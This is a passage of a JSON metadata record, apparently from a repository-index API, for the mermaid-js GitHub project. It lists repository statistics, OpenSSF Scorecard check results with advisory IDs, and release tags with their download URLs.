authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":181,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273137429,"owners_count":25052011,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-01T02:00:09.058Z","response_time":120,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"mermaid@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1/manifests"},{"name":"@mermaid-js/tiny@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1/manifests"},{"name":"v10.9.4","sha":"80dcf2eaad5b484ea41b5e0a8aee3fa8c5b99d34","kind":"commit","published_at":"2025-08-19T08:40:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4/manifests"},{"name":"mermaid@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.9","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9/manifests"},{"name":"@mermaid-js/tiny@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.2","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2/manifests"},{"name":"mermaid@11.9.0","sha":"767754f4fbfe22e74e0612c5d684e9b58c3c5caf","kind":"commit","published_at":"2025-07-16T08:25:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0/manifests"},{"name":"@mermaid-js/tiny@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1/manifests"},{"name":"@mermaid-js/parser@0.6.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1/manifests"},{"name":"mermaid@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1/manifests"},{"name":"@mermaid-js/tiny@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0/manifests"},{"name":"mermaid@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0/manifests"},{"name":"@mermaid-js/parser@0.6.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0/manifests"},{"name":"@mermaid-js/parser@0.5.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.8","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8/manifests"},{"name":"mermaid@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0/manifests"},{"name":"@mermaid-js/tiny@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.1","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1/manifests"},{"name":"@mermaid-js/parser@0.4.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0/manifests"},{"name":"mermaid@11.6.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeloa